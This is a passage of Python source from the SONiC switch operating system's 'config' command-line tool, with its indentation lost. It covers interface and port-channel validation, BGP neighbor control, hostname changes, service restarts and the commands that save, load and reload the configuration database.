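#   interface_alias_to_name(config_db, "PortChannel0001") -> "PortChannel0001"  (no alias, returned unchanged)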
def interface_name_is_valid(config_db, interface_name):
"""Check if the interface name is valid
"""
# If the input parameter config_db is None, derive it from interface.
# In single ASIC platform, get_port_namespace() returns DEFAULT_NAMESPACE.
if config_db is None:
namespace = get_port_namespace(interface_name)
if namespace is None:
return False
config_db = ConfigDBConnector(use_unix_socket_path=True, namespace=namespace)
config_db.connect()
port_dict = config_db.get_table('PORT')
port_channel_dict = config_db.get_table('PORTCHANNEL')
sub_port_intf_dict = config_db.get_table('VLAN_SUB_INTERFACE')
if clicommon.get_interface_naming_mode() == "alias":
interface_name = interface_alias_to_name(config_db, interface_name)
if interface_name is not None:
if not port_dict:
click.echo("port_dict is None!")
raise click.Abort()
for port_name in port_dict:
if interface_name == port_name:
return True
if port_channel_dict:
for port_channel_name in port_channel_dict:
if interface_name == port_channel_name:
return True
if sub_port_intf_dict:
for sub_port_intf_name in sub_port_intf_dict:
if interface_name == sub_port_intf_name:
return True
return False
def interface_name_to_alias(config_db, interface_name):
"""Return alias interface name if default name is given as argument
"""
# If the input parameter config_db is None, derive it from interface.
# In single ASIC platform, get_port_namespace() returns DEFAULT_NAMESPACE.
if config_db is None:
namespace = get_port_namespace(interface_name)
if namespace is None:
return None
config_db = ConfigDBConnector(use_unix_socket_path=True, namespace=namespace)
config_db.connect()
port_dict = config_db.get_table('PORT')
if interface_name is not None:
if not port_dict:
click.echo("port_dict is None!")
raise click.Abort()
for port_name in port_dict:
if interface_name == port_name:
return port_dict[port_name]['alias']
return None
def interface_ipaddr_dependent_on_interface(config_db, interface_name):
"""Get table keys including ipaddress
"""
data = []
table_name = get_interface_table_name(interface_name)
if table_name == "":
return data
keys = config_db.get_keys(table_name)
for key in keys:
if interface_name in key and len(key) == 2:
data.append(key)
return data
def is_interface_bind_to_vrf(config_db, interface_name):
"""Get interface if bind to vrf or not
"""
table_name = get_interface_table_name(interface_name)
if table_name == "":
return False
entry = config_db.get_entry(table_name, interface_name)
if entry and entry.get("vrf_name"):
return True
return False
def is_portchannel_name_valid(portchannel_name):
"""Port channel name validation
"""
# Return True if Portchannel name is PortChannelXXXX (XXXX can be 0-9999)
if portchannel_name[:CFG_PORTCHANNEL_PREFIX_LEN] != CFG_PORTCHANNEL_PREFIX :
return False
if (portchannel_name[CFG_PORTCHANNEL_PREFIX_LEN:].isdigit() is False or
int(portchannel_name[CFG_PORTCHANNEL_PREFIX_LEN:]) > CFG_PORTCHANNEL_MAX_VAL) :
return False
if len(portchannel_name) > CFG_PORTCHANNEL_NAME_TOTAL_LEN_MAX:
return False
return True
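# Illustrative examples (not in the original source):
#   is_portchannel_name_valid("PortChannel0001")  -> True
#   is_portchannel_name_valid("PortChannel10000") -> False  (ID above CFG_PORTCHANNEL_MAX_VAL)
#   is_portchannel_name_valid("Po1")              -> False  (prefix is not "PortChannel")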
def is_portchannel_present_in_db(db, portchannel_name):
"""Check if Portchannel is present in Config DB
"""
# Return True if Portchannel name exists in the CONFIG_DB
portchannel_list = db.get_table(CFG_PORTCHANNEL_PREFIX)
if portchannel_list is None:
return False
if portchannel_name in portchannel_list:
return True
return False
def is_port_member_of_this_portchannel(db, port_name, portchannel_name):
"""Check if a port is member of given portchannel
"""
portchannel_list = db.get_table(CFG_PORTCHANNEL_PREFIX)
if portchannel_list is None:
return False
for k,v in db.get_table('PORTCHANNEL_MEMBER'):
if (k == portchannel_name) and (v == port_name):
return True
return False
# Return the namespace where an interface belongs
# The port name input could be in default mode or in alias mode.
def get_port_namespace(port):
# If it is a non multi-asic platform, or if the interface is management interface
# return DEFAULT_NAMESPACE
if not multi_asic.is_multi_asic() or port == 'eth0':
return DEFAULT_NAMESPACE
# Get the table to check for interface presence
table_name = get_port_table_name(port)
if table_name == "":
return None
ns_list = multi_asic.get_all_namespaces()
namespaces = ns_list['front_ns'] + ns_list['back_ns']
for namespace in namespaces:
config_db = ConfigDBConnector(use_unix_socket_path=True, namespace=namespace)
config_db.connect()
# If the interface naming mode is alias, search the tables for alias_name.
if clicommon.get_interface_naming_mode() == "alias":
port_dict = config_db.get_table(table_name)
if port_dict:
for port_name in port_dict:
if port == port_dict[port_name]['alias']:
return namespace
else:
entry = config_db.get_entry(table_name, port)
if entry:
return namespace
return None
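# Illustrative behaviour (namespace names are assumed): on a multi-ASIC system
# get_port_namespace("Ethernet0") might return "asic0", while
# get_port_namespace("eth0") always returns DEFAULT_NAMESPACE (the linux host).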
def del_interface_bind_to_vrf(config_db, vrf_name):
"""del interface bind to vrf
"""
tables = ['INTERFACE', 'PORTCHANNEL_INTERFACE', 'VLAN_INTERFACE', 'LOOPBACK_INTERFACE']
for table_name in tables:
interface_dict = config_db.get_table(table_name)
if interface_dict:
for interface_name in interface_dict:
if 'vrf_name' in interface_dict[interface_name] and vrf_name == interface_dict[interface_name]['vrf_name']:
interface_dependent = interface_ipaddr_dependent_on_interface(config_db, interface_name)
for interface_del in interface_dependent:
config_db.set_entry(table_name, interface_del, None)
config_db.set_entry(table_name, interface_name, None)
def set_interface_naming_mode(mode):
"""Modify SONIC_CLI_IFACE_MODE env variable in user .bashrc
"""
user = os.getenv('SUDO_USER')
bashrc_ifacemode_line = "export SONIC_CLI_IFACE_MODE={}".format(mode)
# In case of multi-asic, we can check for the alias mode support in any of
# the namespaces as this setting of alias mode should be identical everywhere.
# Here by default we set the namespaces to be a list just having '' which
# represents the linux host. In case of multi-asic, we take the first namespace
# created for the front facing ASIC.
namespaces = [DEFAULT_NAMESPACE]
if multi_asic.is_multi_asic():
namespaces = multi_asic.get_all_namespaces()['front_ns']
# Ensure all interfaces have an 'alias' key in PORT dict
config_db = ConfigDBConnector(use_unix_socket_path=True, namespace=namespaces[0])
config_db.connect()
port_dict = config_db.get_table('PORT')
if not port_dict:
click.echo("port_dict is None!")
raise click.Abort()
for port_name in port_dict:
try:
if port_dict[port_name]['alias']:
pass
except KeyError:
click.echo("Platform does not support alias mapping")
raise click.Abort()
if not user:
user = os.getenv('USER')
if user != "root":
bashrc = "/home/{}/.bashrc".format(user)
else:
click.get_current_context().fail("Cannot set interface naming mode for root user!")
f = open(bashrc, 'r')
filedata = f.read()
f.close()
if "SONIC_CLI_IFACE_MODE" not in filedata:
newdata = filedata + bashrc_ifacemode_line
newdata += "\n"
else:
newdata = re.sub(r"export SONIC_CLI_IFACE_MODE=\w+",
bashrc_ifacemode_line, filedata)
f = open(bashrc, 'w')
f.write(newdata)
f.close()
click.echo("Please logout and log back in for changes take effect.")
def _is_neighbor_ipaddress(config_db, ipaddress):
"""Returns True if a neighbor has the IP address <ipaddress>, False if not
"""
entry = config_db.get_entry('BGP_NEIGHBOR', ipaddress)
return True if entry else False
def _get_all_neighbor_ipaddresses(config_db):
"""Returns list of strings containing IP addresses of all BGP neighbors
"""
addrs = []
bgp_sessions = config_db.get_table('BGP_NEIGHBOR')
for addr, session in bgp_sessions.items():
addrs.append(addr)
return addrs
def _get_neighbor_ipaddress_list_by_hostname(config_db, hostname):
"""Returns list of strings, each containing an IP address of neighbor with
hostname <hostname>. Returns empty list if <hostname> not a neighbor
"""
addrs = []
bgp_sessions = config_db.get_table('BGP_NEIGHBOR')
for addr, session in bgp_sessions.items():
if 'name' in session and session['name'] == hostname:
addrs.append(addr)
return addrs
def _change_bgp_session_status_by_addr(config_db, ipaddress, status, verbose):
"""Start up or shut down BGP session by IP address
"""
verb = 'Starting' if status == 'up' else 'Shutting'
click.echo("{} {} BGP session with neighbor {}...".format(verb, status, ipaddress))
config_db.mod_entry('bgp_neighbor', ipaddress, {'admin_status': status})
def _change_bgp_session_status(config_db, ipaddr_or_hostname, status, verbose):
"""Start up or shut down BGP session by IP address or hostname
"""
ip_addrs = []
# If we were passed an IP address, convert it to lowercase because IPv6 addresses were
# stored in ConfigDB with all lowercase alphabet characters during minigraph parsing
if _is_neighbor_ipaddress(config_db, ipaddr_or_hostname.lower()):
ip_addrs.append(ipaddr_or_hostname.lower())
else:
# If <ipaddr_or_hostname> is not the IP address of a neighbor, check to see if it's a hostname
ip_addrs = _get_neighbor_ipaddress_list_by_hostname(config_db, ipaddr_or_hostname)
if not ip_addrs:
return False
for ip_addr in ip_addrs:
_change_bgp_session_status_by_addr(config_db, ip_addr, status, verbose)
return True
def _validate_bgp_neighbor(config_db, neighbor_ip_or_hostname):
"""validates whether the given ip or host name is a BGP neighbor
"""
ip_addrs = []
if _is_neighbor_ipaddress(config_db, neighbor_ip_or_hostname.lower()):
ip_addrs.append(neighbor_ip_or_hostname.lower())
else:
ip_addrs = _get_neighbor_ipaddress_list_by_hostname(config_db, neighbor_ip_or_hostname.upper())
return ip_addrs
def _remove_bgp_neighbor_config(config_db, neighbor_ip_or_hostname):
"""Removes BGP configuration of the given neighbor
"""
ip_addrs = _validate_bgp_neighbor(config_db, neighbor_ip_or_hostname)
if not ip_addrs:
return False
for ip_addr in ip_addrs:
config_db.mod_entry('bgp_neighbor', ip_addr, None)
click.echo("Removed configuration of BGP neighbor {}".format(ip_addr))
return True
def _change_hostname(hostname):
current_hostname = os.uname()[1]
if current_hostname != hostname:
clicommon.run_command('echo {} > /etc/hostname'.format(hostname), display_cmd=True)
clicommon.run_command('hostname -F /etc/hostname', display_cmd=True)
clicommon.run_command(r'sed -i "/\s{}$/d" /etc/hosts'.format(current_hostname), display_cmd=True)
clicommon.run_command('echo "127.0.0.1 {}" >> /etc/hosts'.format(hostname), display_cmd=True)
def _clear_qos():
QOS_TABLE_NAMES = [
'TC_TO_PRIORITY_GROUP_MAP',
'MAP_PFC_PRIORITY_TO_QUEUE',
'TC_TO_QUEUE_MAP',
'DSCP_TO_TC_MAP',
'SCHEDULER',
'PFC_PRIORITY_TO_PRIORITY_GROUP_MAP',
'PORT_QOS_MAP',
'WRED_PROFILE',
'QUEUE',
'CABLE_LENGTH',
'BUFFER_POOL',
'BUFFER_PROFILE',
'BUFFER_PG',
'BUFFER_QUEUE']
namespace_list = [DEFAULT_NAMESPACE]
if multi_asic.get_num_asics() > 1:
namespace_list = multi_asic.get_namespaces_from_linux()
for ns in namespace_list:
if ns is DEFAULT_NAMESPACE:
config_db = ConfigDBConnector()
else:
config_db = ConfigDBConnector(
use_unix_socket_path=True, namespace=ns
)
config_db.connect()
for qos_table in QOS_TABLE_NAMES:
config_db.delete_table(qos_table)
def _get_sonic_generated_services(num_asic):
if not os.path.isfile(SONIC_GENERATED_SERVICE_PATH):
return None
generated_services_list = []
generated_multi_instance_services = []
with open(SONIC_GENERATED_SERVICE_PATH) as generated_service_file:
for line in generated_service_file:
if '@' in line:
line = line.replace('@', '')
if num_asic > 1:
generated_multi_instance_services.append(line.rstrip('\n'))
else:
generated_services_list.append(line.rstrip('\n'))
else:
generated_services_list.append(line.rstrip('\n'))
return generated_services_list, generated_multi_instance_services
# Callback for confirmation prompt. Aborts if user enters "n"
def _abort_if_false(ctx, param, value):
if not value:
ctx.abort()
def _get_disabled_services_list(config_db):
disabled_services_list = []
feature_table = config_db.get_table('FEATURE')
if feature_table is not None:
for feature_name in feature_table:
if not feature_name:
log.log_warning("Feature is None")
continue
state = feature_table[feature_name]['state']
if not state:
log.log_warning("Enable state of feature '{}' is None".format(feature_name))
continue
if state == "disabled":
disabled_services_list.append(feature_name)
else:
log.log_warning("Unable to retreive FEATURE table")
return disabled_services_list
def _stop_services(config_db):
# This list is order-dependent. Please add services in the order they should be stopped
# on Mellanox platform pmon is stopped by syncd
services_to_stop = [
'telemetry',
'restapi',
'swss',
'lldp',
'pmon',
'bgp',
'hostcfgd',
'nat'
]
if asic_type == 'mellanox' and 'pmon' in services_to_stop:
services_to_stop.remove('pmon')
disabled_services = _get_disabled_services_list(config_db)
for service in disabled_services:
if service in services_to_stop:
services_to_stop.remove(service)
execute_systemctl(services_to_stop, SYSTEMCTL_ACTION_STOP)
def _reset_failed_services(config_db):
# This list is order-independent. Please keep list in alphabetical order
services_to_reset = [
'bgp',
'dhcp_relay',
'hostcfgd',
'hostname-config',
'interfaces-config',
'lldp',
'nat',
'ntp-config',
'pmon',
'radv',
'restapi',
'rsyslog-config',
'sflow',
'snmp',
'swss',
'syncd',
'teamd',
'telemetry'
]
disabled_services = _get_disabled_services_list(config_db)
for service in disabled_services:
if service in services_to_reset:
services_to_reset.remove(service)
execute_systemctl(services_to_reset, SYSTEMCTL_ACTION_RESET_FAILED)
def _restart_services(config_db):
# This list is order-dependent. Please add services in the order they should be started
# on Mellanox platform pmon is started by syncd
services_to_restart = [
'hostname-config',
'interfaces-config',
'ntp-config',
'rsyslog-config',
'swss',
'bgp',
'pmon',
'lldp',
'hostcfgd',
'nat',
'sflow',
'restapi',
'telemetry'
]
disabled_services = _get_disabled_services_list(config_db)
for service in disabled_services:
if service in services_to_restart:
services_to_restart.remove(service)
if asic_type == 'mellanox' and 'pmon' in services_to_restart:
services_to_restart.remove('pmon')
execute_systemctl(services_to_restart, SYSTEMCTL_ACTION_RESTART)
# Reload Monit configuration to pick up new hostname in case it changed
click.echo("Reloading Monit configuration ...")
clicommon.run_command("sudo monit reload")
def interface_is_in_vlan(vlan_member_table, interface_name):
""" Check if an interface is in a vlan """
for _, intf in vlan_member_table:
if intf == interface_name:
return True
return False
def interface_is_in_portchannel(portchannel_member_table, interface_name):
""" Check if an interface is part of portchannel """
for _, intf in portchannel_member_table:
if intf == interface_name:
return True
return False
def interface_has_mirror_config(mirror_table, interface_name):
""" Check if port is already configured with mirror config """
for _, v in mirror_table.items():
if 'src_port' in v and v['src_port'] == interface_name:
return True
if 'dst_port' in v and v['dst_port'] == interface_name:
return True
return False
def validate_mirror_session_config(config_db, session_name, dst_port, src_port, direction):
""" Check if SPAN mirror-session config is valid """
if len(config_db.get_entry('MIRROR_SESSION', session_name)) != 0:
click.echo("Error: {} already exists".format(session_name))
return False
vlan_member_table = config_db.get_table('VLAN_MEMBER')
mirror_table = config_db.get_table('MIRROR_SESSION')
portchannel_member_table = config_db.get_table('PORTCHANNEL_MEMBER')
if dst_port:
if not interface_name_is_valid(config_db, dst_port):
click.echo("Error: Destination Interface {} is invalid".format(dst_port))
return False
if interface_is_in_vlan(vlan_member_table, dst_port):
click.echo("Error: Destination Interface {} has vlan config".format(dst_port))
return False
if interface_has_mirror_config(mirror_table, dst_port):
click.echo("Error: Destination Interface {} already has mirror config".format(dst_port))
return False
if interface_is_in_portchannel(portchannel_member_table, dst_port):
click.echo("Error: Destination Interface {} has portchannel config".format(dst_port))
return False
if clicommon.is_port_router_interface(config_db, dst_port):
click.echo("Error: Destination Interface {} is a L3 interface".format(dst_port))
return False
if src_port:
for port in src_port.split(","):
if not interface_name_is_valid(config_db, port):
click.echo("Error: Source Interface {} is invalid".format(port))
return False
if dst_port and dst_port == port:
click.echo("Error: Destination Interface cant be same as Source Interface")
return False
if interface_has_mirror_config(mirror_table, port):
click.echo("Error: Source Interface {} already has mirror config".format(port))
return False
if direction:
if direction not in ['rx', 'tx', 'both']:
click.echo("Error: Direction {} is invalid".format(direction))
return False
return True
def update_sonic_environment():
"""Prepare sonic environment variable using SONiC environment template file.
"""
SONIC_ENV_TEMPLATE_FILE = os.path.join('/', "usr", "share", "sonic", "templates", "sonic-environment.j2")
SONIC_VERSION_YML_FILE = os.path.join('/', "etc", "sonic", "sonic_version.yml")
SONIC_ENV_FILE = os.path.join('/', "etc", "sonic", "sonic-environment")
if os.path.isfile(SONIC_ENV_TEMPLATE_FILE) and os.path.isfile(SONIC_VERSION_YML_FILE):
clicommon.run_command(
"{} -d -y {} -t {},{}".format(
SONIC_CFGGEN_PATH,
SONIC_VERSION_YML_FILE,
SONIC_ENV_TEMPLATE_FILE,
SONIC_ENV_FILE
),
display_cmd=True
)
# This is our main entrypoint - the main 'config' command
@click.group(cls=clicommon.AbbreviationGroup, context_settings=CONTEXT_SETTINGS)
@click.pass_context
def config(ctx):
"""SONiC command line - 'config' command"""
#
# Load asic_type for further use
#
global asic_type
try:
version_info = device_info.get_sonic_version_info()
asic_type = version_info['asic_type']
except (KeyError, TypeError):
raise click.Abort()
if asic_type == 'mellanox':
platform.add_command(mlnx.mlnx)
# Load the global config file database_global.json once.
SonicDBConfig.load_sonic_global_db_config()
if os.geteuid() != 0:
exit("Root privileges are required for this operation")
ctx.obj = Db()
# Add groups from other modules
config.add_command(aaa.aaa)
config.add_command(aaa.tacacs)
config.add_command(chassis_modules.chassis_modules)
config.add_command(console.console)
config.add_command(feature.feature)
config.add_command(kdump.kdump)
config.add_command(kube.kubernetes)
config.add_command(muxcable.muxcable)
config.add_command(nat.nat)
config.add_command(vlan.vlan)
config.add_command(vxlan.vxlan)
@config.command()
@click.option('-y', '--yes', is_flag=True, callback=_abort_if_false,
expose_value=False, prompt='Existing files will be overwritten, continue?')
@click.argument('filename', required=False)
def save(filename):
"""Export current config DB to a file on disk.\n
<filename> : Names of configuration file(s) to save, separated by comma with no spaces in between
"""
num_asic = multi_asic.get_num_asics()
cfg_files = []
num_cfg_file = 1
if multi_asic.is_multi_asic():
num_cfg_file += num_asic
# If the user give the filename[s], extract the file names.
if filename is not None:
cfg_files = filename.split(',')
if len(cfg_files) != num_cfg_file:
click.echo("Input {} config file(s) separated by comma for multiple files ".format(num_cfg_file))
return
# In case of multi-asic mode we have additional config_db{NS}.json files for
# various namespaces created per ASIC. {NS} is the namespace index.
for inst in range(-1, num_cfg_file-1):
#inst = -1, refers to the linux host where there is no namespace.
if inst == -1:
namespace = None
else:
namespace = "{}{}".format(NAMESPACE_PREFIX, inst)
# Get the file from user input, else take the default file /etc/sonic/config_db{NS_id}.json
if cfg_files:
file = cfg_files[inst+1]
else:
if namespace is None:
file = DEFAULT_CONFIG_DB_FILE
else:
file = "/etc/sonic/config_db{}.json".format(inst)
if namespace is None:
command = "{} -d --print-data > {}".format(SONIC_CFGGEN_PATH, file)
else:
command = "{} -n {} -d --print-data > {}".format(SONIC_CFGGEN_PATH, namespace, file)
log.log_info("'save' executing...")
clicommon.run_command(command, display_cmd=True)
@config.command()
@click.option('-y', '--yes', is_flag=True)
@click.argument('filename', required=False)
def load(filename, yes):
"""Import a previous saved config DB dump file.
<filename> : Names of configuration file(s) to load, separated by comma with no spaces in between
"""
if filename is None:
message = 'Load config from the default config file(s) ?'
else:
message = 'Load config from the file(s) {} ?'.format(filename)
if not yes:
click.confirm(message, abort=True)
num_asic = multi_asic.get_num_asics()
cfg_files = []
num_cfg_file = 1
if multi_asic.is_multi_asic():
num_cfg_file += num_asic
# If the user give the filename[s], extract the file names.
if filename is not None:
cfg_files = filename.split(',')
if len(cfg_files) != num_cfg_file:
click.echo("Input {} config file(s) separated by comma for multiple files ".format(num_cfg_file))
return
# In case of multi-asic mode we have additional config_db{NS}.json files for
# various namespaces created per ASIC. {NS} is the namespace index.
for inst in range(-1, num_cfg_file-1):
#inst = -1, refers to the linux host where there is no namespace.
if inst == -1:
namespace = None
else:
namespace = "{}{}".format(NAMESPACE_PREFIX, inst)
# Get the file from user input, else take the default file /etc/sonic/config_db{NS_id}.json
if cfg_files:
file = cfg_files[inst+1]
else:
if namespace is None:
file = DEFAULT_CONFIG_DB_FILE
else:
file = "/etc/sonic/config_db{}.json".format(inst)
# if any of the config files in linux host OR namespace is not present, return
if not os.path.exists(file):
click.echo("The config_db file {} doesn't exist".format(file))
return
if namespace is None:
command = "{} -j {} --write-to-db".format(SONIC_CFGGEN_PATH, file)
else:
command = "{} -n {} -j {} --write-to-db".format(SONIC_CFGGEN_PATH, namespace, file)
log.log_info("'load' executing...")
clicommon.run_command(command, display_cmd=True)
@config.command()
@click.option('-y', '--yes', is_flag=True)
@click.option('-l', '--load-sysinfo', is_flag=True, help='load system default information (mac, portmap etc) first.')
@click.option('-n', '--no_service_restart', default=False, is_flag=True, help='Do not restart docker services')
@click.argument('filename', required=False)
@clicommon.pass_db
def reload(db, filename, yes, load_sysinfo, no_service_restart):
"""Clear current configuration and import a previous saved config DB dump file.
<filename> : Names of configuration file(s) to load, separated by comma with no spaces in between
"""
if filename is None:
message = 'Clear current config and reload config from the default config file(s) ?'
else:
message = 'Clear current config and reload config from the file(s) {} ?'.format(filename)
if not yes:
click.confirm(message, abort=True)
log.log_info("'reload' executing...")
num_asic = multi_asic.get_num_asics()
cfg_files = []
num_cfg_file = 1
if multi_asic.is_multi_asic():
num_cfg_file += num_asic
# If the user give the filename[s], extract the file names.
if filename is not None:
cfg_files = filename.split(',')
if len(cfg_files) != num_cfg_file:
click.echo("Input {} config file(s) separated by comma for multiple files ".format(num_cfg_file))
return
if load_sysinfo:
command = "{} -j {} -v DEVICE_METADATA.localhost.hwsku".format(SONIC_CFGGEN_PATH, filename)
proc = subprocess.Popen(command, shell=True, text=True, stdout=subprocess.PIPE)
cfg_hwsku, err = proc.communicate()
if err:
click.echo("Could not get the HWSKU from config file, exiting")
sys.exit(1)
else:
cfg_hwsku = cfg_hwsku.strip()
#Stop services before config push
if not no_service_restart:
log.log_info("'reload' stopping services...")
_stop_services(db.cfgdb)
# In Single ASIC platforms we have single DB service. In multi-ASIC platforms we have a global DB
# service running in the host + DB services running in each ASIC namespace created per ASIC.
# In the below logic, we get all namespaces in this platform and add an empty namespace ''
# denoting the current namespace which we are in ( the linux host )
for inst in range(-1, num_cfg_file-1):
# Get the namespace name, for linux host it is None
if inst == -1:
namespace = None
else:
namespace = "{}{}".format(NAMESPACE_PREFIX, inst)
# Get the file from user input, else take the default file /etc/sonic/config_db{NS_id}.json
if cfg_files:
file = cfg_files[inst+1]
else:
if namespace is None:
file = DEFAULT_CONFIG_DB_FILE
else:
file = "/etc/sonic/config_db{}.json".format(inst)
# Check the file exists before proceeding.
if not os.path.exists(file):
click.echo("The config_db file {} doesn't exist".format(file))
continue
if namespace is None:
config_db = ConfigDBConnector()
else:
config_db = ConfigDBConnector(use_unix_socket_path=True, namespace=namespace)
config_db.connect()
client = config_db.get_redis_client(config_db.CONFIG_DB)
client.flushdb()
if load_sysinfo:
if namespace is None:
command = "{} -H -k {} --write-to-db".format(SONIC_CFGGEN_PATH, cfg_hwsku)
else:
command = "{} -H -k {} -n {} --write-to-db".format(SONIC_CFGGEN_PATH, cfg_hwsku, namespace)
clicommon.run_command(command, display_cmd=True)
# For the database service running in linux host we use the file user gives as input
# or by default DEFAULT_CONFIG_DB_FILE. In the case of database service running in namespace,
# the default config_db<namespaceID>.json format is used.
if namespace is None:
if os.path.isfile(INIT_CFG_FILE):
command = "{} -j {} -j {} --write-to-db".format(SONIC_CFGGEN_PATH, INIT_CFG_FILE, file)
else:
command = "{} -j {} --write-to-db".format(SONIC_CFGGEN_PATH, file)
else:
if os.path.isfile(INIT_CFG_FILE):
command = "{} -j {} -j {} -n {} --write-to-db".format(SONIC_CFGGEN_PATH, INIT_CFG_FILE, file, namespace)
else:
command = "{} -j {} -n {} --write-to-db".format(SONIC_CFGGEN_PATH, file, namespace)
clicommon.run_command(command, display_cmd=True)
client.set(config_db.INIT_INDICATOR, 1)
# Migrate DB contents to latest version
db_migrator='/usr/local/bin/db_migrator.py'
if os.path.isfile(db_migrator) and os.access(db_migrator, os.X_OK):
if namespace is None:
command = "{} -o migrate".format(db_migrator)
else:
command = "{} -o migrate -n {}".format(db_migrator, namespace)
clicommon.run_command(command, display_cmd=True)
# We first run "systemctl reset-failed" to remove the "failed"
# status from all services before we attempt to restart them
if not no_service_restart:
_reset_failed_services(db.cfgdb)
log.log_info("'reload' restarting services...")
_restart_services(db.cfgdb)
@config.command("load_mgmt_config")
@click.option('-y', '--yes', is_flag=True, callback=_abort_if_false,
expose_value=False, prompt='Reload mgmt config?')
@click.argument('filename', default='/etc/sonic/device_desc.xml', type=click.Path(exists=True))
def load_mgmt_config(filename):
"""Reconfigure hostname and mgmt interface based on device description file."""
log.log_info("'load_mgmt_config' executing...")
command = "{} -M {} --write-to-db".format(SONIC_CFGGEN_PATH, filename)
clicommon.run_command(command, display_cmd=True)
#FIXME: After config DB daemon for hostname and mgmt interface is implemented, we'll no longer need to do manual configuration here
config_data = parse_device_desc_xml(filename)
hostname = config_data['DEVICE_METADATA']['localhost']['hostname']
_change_hostname(hostname)
mgmt_conf = netaddr.IPNetwork(list(config_data['MGMT_INTERFACE'].keys())[0][1])
gw_addr = list(config_data['MGMT_INTERFACE'].values())[0]['gwaddr']
command = "ifconfig eth0 {} netmask {}".format(str(mgmt_conf.ip), str(mgmt_conf.netmask))
clicommon.run_command(command, display_cmd=True)
command = "ip route add default via {} dev eth0 table default".format(gw_addr)
clicommon.run_command(command, display_cmd=True, ignore_error=True)
command = "ip rule add from {} table default".format(str(mgmt_conf.ip))
clicommon.run_command(command, display_cmd=True, ignore_error=True)
command = "[ -f /var/run/dhclient.eth0.pid ] && kill `cat /var/run/dhclient.eth0.pid` && rm -f /var/run/dhclient.eth0.pid"
clicommon.run_command(command, display_cmd=True, ignore_error=True)
click.echo("Please note loaded setting will be lost after system reboot. To preserve setting, run `config save`.")
@config.command("load_minigraph")
@click.option('-y', '--yes', is_flag=True, callback=_abort_if_false,
expose_value=False, prompt='Reload config from minigraph?')
@click.option('-n', '--no_service_restart', default=False, is_flag=True, help='Do not restart docker services')
@clicommon.pass_db
def load_minigraph(db, no_service_restart):
"""Reconfigure based on minigraph."""
log.log_info("'load_minigraph' executing...")
#Stop services before config push
if not no_service_restart:
log.log_info("'load_minigraph' stopping services...")
_stop_services(db.cfgdb)
    # For a single-ASIC platform the namespace list has only the empty string;
    # for a multi-ASIC platform the empty string is kept to generate the config
    # for the linux host, and the ASIC namespaces are appended below.
namespace_list = [DEFAULT_NAMESPACE]
num_npus = multi_asic.get_num_asics()
if num_npus > 1:
namespace_list += multi_asic.get_namespaces_from_linux()
for namespace in namespace_list:
if namespace is DEFAULT_NAMESPACE:
config_db = ConfigDBConnector()
cfggen_namespace_option = " "
ns_cmd_prefix = ""
else:
config_db = ConfigDBConnector(use_unix_socket_path=True, namespace=namespace)
cfggen_namespace_option = " -n {}".format(namespace)
ns_cmd_prefix = "sudo ip netns exec {} ".format(namespace)
config_db.connect()
client = config_db.get_redis_client(config_db.CONFIG_DB)
client.flushdb()
if os.path.isfile('/etc/sonic/init_cfg.json'):
command = "{} -H -m -j /etc/sonic/init_cfg.json {} --write-to-db".format(SONIC_CFGGEN_PATH, cfggen_namespace_option)
else:
command = "{} -H -m --write-to-db {}".format(SONIC_CFGGEN_PATH, cfggen_namespace_option)
clicommon.run_command(command, display_cmd=True)
client.set(config_db.INIT_INDICATOR, 1)
# get the device type
device_type = _get_device_type()
if device_type != 'MgmtToRRouter':
clicommon.run_command("pfcwd start_default", display_cmd=True)
    # Update SONiC environment file
update_sonic_environment()
if os.path.isfile('/etc/sonic/acl.json'):
clicommon.run_command("acl-loader update full /etc/sonic/acl.json", display_cmd=True)
# generate QoS and Buffer configs
clicommon.run_command("config qos reload --no-dynamic-buffer", display_cmd=True)
# Write latest db version string into db
db_migrator='/usr/local/bin/db_migrator.py'
if os.path.isfile(db_migrator) and os.access(db_migrator, os.X_OK):
for namespace in namespace_list:
if namespace is DEFAULT_NAMESPACE:
cfggen_namespace_option = " "
else:
cfggen_namespace_option = " -n {}".format(namespace)
clicommon.run_command(db_migrator + ' -o set_version' + cfggen_namespace_option)
# We first run "systemctl reset-failed" to remove the "failed"
# status from all services before we attempt to restart them
if not no_service_restart:
_reset_failed_services(db.cfgdb)
#FIXME: After config DB daemon is implemented, we'll no longer need to restart every service.
log.log_info("'load_minigraph' restarting services...")
_restart_services(db.cfgdb)
click.echo("Please note setting loaded from minigraph will be lost after system reboot. To preserve setting, run `config save`.")
#
# 'hostname' command
#
@config.command('hostname')
@click.argument('new_hostname', metavar='<new_hostname>', required=True)
def hostname(new_hostname):
"""Change device hostname without impacting the traffic."""
config_db = ConfigDBConnector()
config_db.connect()
config_db.mod_entry('DEVICE_METADATA' , 'localhost', {"hostname" : new_hostname})
try:
command = "service hostname-config restart"
clicommon.run_command(command, display_cmd=True)
except SystemExit as e:
click.echo("Restarting hostname-config service failed with error {}".format(e))
raise
# Reload Monit configuration to pick up new hostname in case it changed
click.echo("Reloading Monit configuration ...")
clicommon.run_command("sudo monit reload")
click.echo("Please note loaded setting will be lost after system reboot. To preserve setting, run `config save`.")
#
# 'synchronous_mode' command ('config synchronous_mode ...')
#
@config.command('synchronous_mode')
@click.argument('sync_mode', metavar='<enable|disable>', required=True)
def synchronous_mode(sync_mode):
""" Enable or disable synchronous mode between orchagent and syncd \n
swss restart required to apply the configuration \n
Options to restart swss and apply the configuration: \n
1. config save -y \n
config reload -y \n
2. systemctl restart swss
"""
if sync_mode == 'enable' or sync_mode == 'disable':
config_db = ConfigDBConnector()
config_db.connect()
config_db.mod_entry('DEVICE_METADATA' , 'localhost', {"synchronous_mode" : sync_mode})
click.echo("""Wrote %s synchronous mode into CONFIG_DB, swss restart required to apply the configuration: \n
Option 1. config save -y \n
config reload -y \n
Option 2. systemctl restart swss""" % sync_mode)
else:
raise click.BadParameter("Error: Invalid argument %s, expect either enable or disable" % sync_mode)
#
# 'portchannel' group ('config portchannel ...')
#
@config.group(cls=clicommon.AbbreviationGroup)
# TODO: add "hidden=True" if this is a single ASIC platform, once we have click 7.0 in all branches.
@click.option('-n', '--namespace', help='Namespace name',
required=True if multi_asic.is_multi_asic() else False, type=click.Choice(multi_asic.get_namespace_list()))
@click.pass_context
def portchannel(ctx, namespace):
# Set namespace to default_namespace if it is None.
if namespace is None:
namespace = DEFAULT_NAMESPACE
config_db = ConfigDBConnector(use_unix_socket_path=True, namespace=str(namespace))
config_db.connect()
ctx.obj = {'db': config_db, 'namespace': str(namespace)}
@portchannel.command('add')
@click.argument('portchannel_name', metavar='<portchannel_name>', required=True)
@click.option('--min-links', default=0, type=int)
@click.option('--fallback', default='false')
@click.pass_context
